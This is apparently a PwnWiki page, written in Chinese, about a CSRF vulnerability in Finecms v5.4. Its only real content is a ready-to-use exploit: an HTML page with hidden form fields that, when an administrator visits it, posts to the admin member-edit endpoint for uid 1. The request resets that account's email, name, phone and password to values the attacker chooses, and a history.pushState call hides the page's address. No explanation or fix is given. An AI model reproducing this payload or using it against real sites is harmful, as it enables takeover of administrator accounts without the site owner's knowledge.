Finecms v5.4 管理員密碼修改CSRF漏洞

EXP

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/admin.php?c=member&m=edit&uid=1" method="POST">
      <input type="hidden" name="page" value="0" />
      <input type="hidden" name="member[email]" value="[email protected]" />
      <input type="hidden" name="member[name]" value="admin" />
      <input type="hidden" name="member[phone]" value="18888888888" />
      <input type="hidden" name="member[password]" value="888888" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Anonymous

Search

Finecms v5.4 管理員密碼修改CSRF漏洞

Namespaces

More

Page actions

EXP

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

Finecms v5.4 管理員密碼修改CSRF漏洞

EXP

Navigation

Wiki tools

Page tools